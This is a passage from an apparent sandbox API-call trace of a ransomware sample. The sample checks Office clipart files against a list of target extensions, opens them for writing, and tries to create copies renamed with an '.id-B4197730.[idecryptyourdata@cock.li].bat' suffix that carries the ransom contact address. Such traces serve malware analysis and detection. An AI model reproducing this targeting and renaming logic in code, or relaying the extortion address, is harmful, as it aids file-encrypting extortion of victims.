dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.188] CloseHandle (hObject=0x3ac) returned 1 [0174.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.188] lstrlenW (lpString=".doc") returned 4 [0174.188] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.188] lstrlenW (lpString=".docx") returned 5 [0174.188] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.188] lstrlenW (lpString=".pdf") returned 4 [0174.188] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.188] lstrlenW (lpString=".xls") returned 4 [0174.188] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.188] lstrlenW (lpString=".xlsx") returned 5 [0174.188] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.188] lstrlenW (lpString=".ppt") returned 4 [0174.188] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.189] lstrlenW (lpString=".zip") returned 4 [0174.189] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.189] lstrlenW (lpString=".rar") returned 4 [0174.189] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.189] lstrlenW (lpString=".bz2") returned 4 [0174.189] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.189] lstrlenW (lpString=".7z") returned 3 [0174.189] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.189] lstrlenW (lpString=".dbf") returned 4 [0174.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.189] lstrlenW (lpString=".1cd") returned 4 [0174.189] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.189] lstrlenW (lpString=".jpg") returned 4 [0174.189] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.190] lstrlenW (lpString=".doc") returned 4 [0174.190] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.190] lstrlenW (lpString=".docx") returned 5 [0174.190] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.190] lstrlenW (lpString=".pdf") returned 4 [0174.190] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.190] lstrlenW (lpString=".xls") returned 4 [0174.190] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.190] lstrlenW (lpString=".xlsx") returned 5 [0174.190] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.190] lstrlenW (lpString=".ppt") returned 4 [0174.190] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.190] lstrlenW (lpString=".zip") returned 4 [0174.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.190] lstrlenW (lpString=".rar") returned 4 [0174.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.190] lstrlenW (lpString=".bz2") returned 4 [0174.190] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.191] lstrlenW (lpString=".7z") returned 3 [0174.191] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.191] lstrlenW (lpString=".dbf") returned 4 [0174.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.191] lstrlenW (lpString=".1cd") returned 4 [0174.576] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02045_.WMF") returned 68 [0174.576] lstrlenW (lpString=".jpg") returned 4 [0174.578] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.579] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.579] lstrlenW (lpString="TN00095_.WMF") returned 12 [0174.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00095_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.580] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=5978) returned 1 [0174.580] CloseHandle (hObject=0x4c4) returned 1 [0174.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00095_.wmf")) returned 0x220 [0174.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00095_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00095_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.581] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.581] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00095_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.582] CloseHandle (hObject=0x4c4) returned 1 [0174.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.582] lstrlenW (lpString=".doc") returned 4 [0174.582] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.582] lstrlenW (lpString=".docx") returned 5 [0174.582] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.582] lstrlenW (lpString=".pdf") returned 4 [0174.582] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.582] lstrlenW (lpString=".xls") returned 4 [0174.582] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.582] lstrlenW (lpString=".xlsx") returned 5 [0174.582] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.582] lstrlenW (lpString=".ppt") returned 4 [0174.583] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.583] lstrlenW (lpString=".zip") returned 4 [0174.583] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.583] lstrlenW (lpString=".rar") returned 4 [0174.583] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.583] lstrlenW (lpString=".bz2") returned 4 [0174.583] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.583] lstrlenW (lpString=".7z") returned 3 [0174.583] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.583] lstrlenW (lpString=".dbf") returned 4 [0174.583] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.583] lstrlenW (lpString=".1cd") returned 4 [0174.583] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.583] lstrlenW (lpString=".jpg") returned 4 [0174.583] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.584] lstrlenW (lpString=".doc") returned 4 [0174.584] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.584] lstrlenW (lpString=".docx") returned 5 [0174.584] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.584] lstrlenW (lpString=".pdf") returned 4 [0174.584] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.584] lstrlenW (lpString=".xls") returned 4 [0174.584] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.584] lstrlenW (lpString=".xlsx") returned 5 [0174.584] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.584] lstrlenW (lpString=".ppt") returned 4 [0174.584] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.584] lstrlenW (lpString=".zip") returned 4 [0174.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.584] lstrlenW (lpString=".rar") returned 4 [0174.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.584] lstrlenW (lpString=".bz2") returned 4 [0174.584] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.584] lstrlenW (lpString=".7z") returned 3 [0174.584] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.585] lstrlenW (lpString=".dbf") returned 4 [0174.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.585] lstrlenW (lpString=".1cd") returned 4 [0174.585] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF") returned 68 [0174.585] lstrlenW (lpString=".jpg") returned 4 [0174.585] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.585] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.585] lstrlenW (lpString="TN00211_.WMF") returned 12 [0174.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00211_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.586] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=7186) returned 1 [0174.586] CloseHandle (hObject=0x4c4) returned 1 [0174.586] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00211_.wmf")) returned 0x220 [0174.586] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00211_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00211_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.587] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.587] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00211_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.587] CloseHandle (hObject=0x4c4) returned 1 [0174.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.587] lstrlenW (lpString=".doc") returned 4 [0174.588] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.588] lstrlenW (lpString=".docx") returned 5 [0174.588] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.588] lstrlenW (lpString=".pdf") returned 4 [0174.588] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.588] lstrlenW (lpString=".xls") returned 4 [0174.588] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.588] lstrlenW (lpString=".xlsx") returned 5 [0174.588] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.588] lstrlenW (lpString=".ppt") returned 4 [0174.588] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.588] lstrlenW (lpString=".zip") returned 4 [0174.588] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.588] lstrlenW (lpString=".rar") returned 4 [0174.588] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.589] lstrlenW (lpString=".bz2") returned 4 [0174.589] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.589] lstrlenW (lpString=".7z") returned 3 [0174.589] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.589] lstrlenW (lpString=".dbf") returned 4 [0174.589] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.589] lstrlenW (lpString=".1cd") returned 4 [0174.589] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.589] lstrlenW (lpString=".jpg") returned 4 [0174.589] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.589] lstrlenW (lpString=".doc") returned 4 [0174.589] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.589] lstrlenW (lpString=".docx") returned 5 [0174.590] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.590] lstrlenW (lpString=".pdf") returned 4 [0174.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.590] lstrlenW (lpString=".xls") returned 4 [0174.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.590] lstrlenW (lpString=".xlsx") returned 5 [0174.590] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.590] lstrlenW (lpString=".ppt") returned 4 [0174.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.590] lstrlenW (lpString=".zip") returned 4 [0174.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.590] lstrlenW (lpString=".rar") returned 4 [0174.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.590] lstrlenW (lpString=".bz2") returned 4 [0174.590] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.590] lstrlenW (lpString=".7z") returned 3 [0174.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.591] lstrlenW (lpString=".dbf") returned 4 [0174.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.591] lstrlenW (lpString=".1cd") returned 4 [0174.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF") returned 68 [0174.591] lstrlenW (lpString=".jpg") returned 4 [0174.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.591] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.591] lstrlenW (lpString="TN00217_.WMF") returned 12 [0174.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00217_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.594] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=4644) returned 1 [0174.594] CloseHandle (hObject=0x4c4) returned 1 [0174.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00217_.wmf")) returned 0x220 [0174.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00217_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00217_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.598] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.598] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00217_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.598] CloseHandle (hObject=0x4c4) returned 1 [0174.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.598] lstrlenW (lpString=".doc") returned 4 [0174.598] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.598] lstrlenW (lpString=".docx") returned 5 [0174.598] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.598] lstrlenW (lpString=".pdf") returned 4 [0174.598] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.598] lstrlenW (lpString=".xls") returned 4 [0174.598] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.599] lstrlenW (lpString=".xlsx") returned 5 [0174.599] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.599] lstrlenW (lpString=".ppt") returned 4 [0174.599] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.599] lstrlenW (lpString=".zip") returned 4 [0174.599] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.599] lstrlenW (lpString=".rar") returned 4 [0174.599] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.599] lstrlenW (lpString=".bz2") returned 4 [0174.599] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.599] lstrlenW (lpString=".7z") returned 3 [0174.599] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.599] lstrlenW (lpString=".dbf") returned 4 [0174.599] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.599] lstrlenW (lpString=".1cd") returned 4 [0174.599] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.599] lstrlenW (lpString=".jpg") returned 4 [0174.599] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.600] lstrlenW (lpString=".doc") returned 4 [0174.600] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.600] lstrlenW (lpString=".docx") returned 5 [0174.600] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.600] lstrlenW (lpString=".pdf") returned 4 [0174.600] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.600] lstrlenW (lpString=".xls") returned 4 [0174.600] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.600] lstrlenW (lpString=".xlsx") returned 5 [0174.600] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.600] lstrlenW (lpString=".ppt") returned 4 [0174.600] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.600] lstrlenW (lpString=".zip") returned 4 [0174.600] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.600] lstrlenW (lpString=".rar") returned 4 [0174.600] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.600] lstrlenW (lpString=".bz2") returned 4 [0174.600] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.600] lstrlenW (lpString=".7z") returned 3 [0174.600] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.600] lstrlenW (lpString=".dbf") returned 4 [0174.600] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.601] lstrlenW (lpString=".1cd") returned 4 [0174.601] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF") returned 68 [0174.601] lstrlenW (lpString=".jpg") returned 4 [0174.601] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.601] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.601] lstrlenW (lpString="TN00218_.WMF") returned 12 [0174.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00218_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.602] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=7104) returned 1 [0174.602] CloseHandle (hObject=0x4c4) returned 1 [0174.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00218_.wmf")) returned 0x220 [0174.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00218_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff 